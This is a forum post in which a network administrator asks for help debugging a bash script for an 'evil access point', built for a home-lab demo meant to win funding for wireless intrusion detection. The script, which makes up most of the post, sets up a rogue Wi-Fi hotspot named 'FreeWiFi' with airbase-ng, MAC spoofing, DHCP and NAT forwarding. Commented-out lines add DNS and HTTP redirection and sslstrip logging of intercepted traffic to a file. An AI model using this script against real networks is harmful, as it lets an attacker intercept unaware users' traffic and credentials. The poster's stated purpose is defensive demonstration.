Results 1 to 2 of 2

Thread: issue with setting up an "evil access point" script.

Threaded View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Join Date
    2013-Apr
    Posts
    5

    issue with setting up an "evil access point" script.

    I've demoed some of the tools on Kali with my management in order to get funding for new pieces of hardware and software to combat "rogue elements" on the corporate network. Right now I'm working on a proposal to fund the purchase of Motorola AirDefense and as part of this I'm trying to set up a simple "evil access point". I'm working in my home lab ATM and am having issues with the script for this.

    (I prefer to use shell scripts over GUI tools because the management seems to respond better to seeing text fly by instead of GUI tools... go figure).

    A while back I tried doing this under Backtrack, but couldn't get it working quite right. I dug up the old script I was working with, which IIRC was either one I downloaded or something hacked together from different scripts, but either way I never got it working right.

    Trying this on Kali 2 and I've made some changes from the original script

    Code:
    #!/bin/bash
     
     
    #____[start of config]_________________________
     
    # these two values can be overwritten using 
    # arguments to the command
    essid="FreeWiFi"
    channel="4"
     
    subnet="192.168.100.0"
    startip="192.168.100.100"
    endip="192.168.100.200"
    broadcast="192.168.100.255"
    router="192.168.100.1"
     
    netmask="255.255.255.0"
    dns="8.8.8.8"
     
    #____[end of config]___________________________
     
    # override the default essid if one is provided
    if [[ ! -z ${1} ]]; then
        essid="${1}"
    fi
     
    # override the default channel if one is provided
    if [[ ! -z ${2} ]]; then
        channel="${2}"
    fi
     
    function clear_iptables {
        iptables --flush
        iptables --table nat --flush
        iptables --table nat --delete-chain
        iptables --delete-chain
    }
    function cleanup {
        echo "* cleaning up"
        killall sslstrip
        killall dhcpd
        rm -rf /tmp/dhcpd
        rm -f /tmp/dhcpd.conf
        ifconfig at0 down
        killall airbase-ng
        clear_iptables
        echo "* end of script"
        exit 0
    }
     
    trap cleanup INT
     
    echo "* creating dummy dhcpd.conf"
    cat << EOF > /tmp/dhcpd.conf
    ddns-update-style standard;
    default-lease-time 600;
    max-lease-time 7200;
    subnet ${subnet} netmask ${netmask} {
        option subnet-mask ${netmask};
        option broadcast-address ${broadcast};
        option routers ${router};
        option domain-name-servers ${dns}; 
        range ${startip} ${endip};
    }
    EOF
     
    echo "* starting airbase-ng essid ${essid} on channel ${channel}"
    airbase-ng -e "${essid}" -q -c ${channel} wlan0mon &
    sleep 3
     
    echo "* spoofing MAC address for at0"
    ifconfig at0 down
    macchanger -m 00:17:3F:03:13:37 at0
     
    echo "* bringing up at0 and setting route"
    ifconfig at0 up
    ifconfig at0 ${router} netmask ${netmask}
    route add -net ${subnet} netmask ${netmask} gw ${router}
     
    echo "* starting dhcpd"
    mkdir -p /tmp/dhcpd
    touch /tmp/dhcpd/dhcpd.leases
    chown -R dhcpd:dhcpd /tmp/dhcpd
    dhcpd -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/dhcpd.pid -lf /tmp/dhcpd/dhcpd.leases at0
     
    echo "* setting up forwarding rules"
    clear_iptables
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
     
    # mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
    # echo "* using ${mygw} as gateway"
    # iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw}
    #  
    # iptables -t nat -D PREROUTING 1
    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
     
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    # uncomment these two lines to turn on sslstrip
    # echo "* starting sslstrip and logging results to log.txt"
    # sslstrip -f -k -w log.txt &
     
    echo "* setup complete, now we wait for connections"
    echo "* enter CTRL-C to quit and cleanup"
    while :; do
        sleep 60
    done;
    I can't pinpoint where this is going wrong. I can connect to the AP, but I'm not receiving an IP address via dhcp. I want to be able to connect to the AP and have internet access through it for any client connected to it to simulate a person standing up an malicious AP where the victim is completely unaware that they're at risk of being compromised. It also serves to strengthen my argument against our guest network being wide open so I can clamp down on unfettered access to it.
    Last edited by parsec; 2015-11-17 at 19:45.

Similar Threads

  1. Replies: 0
    Last Post: 2022-04-14, 02:30

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •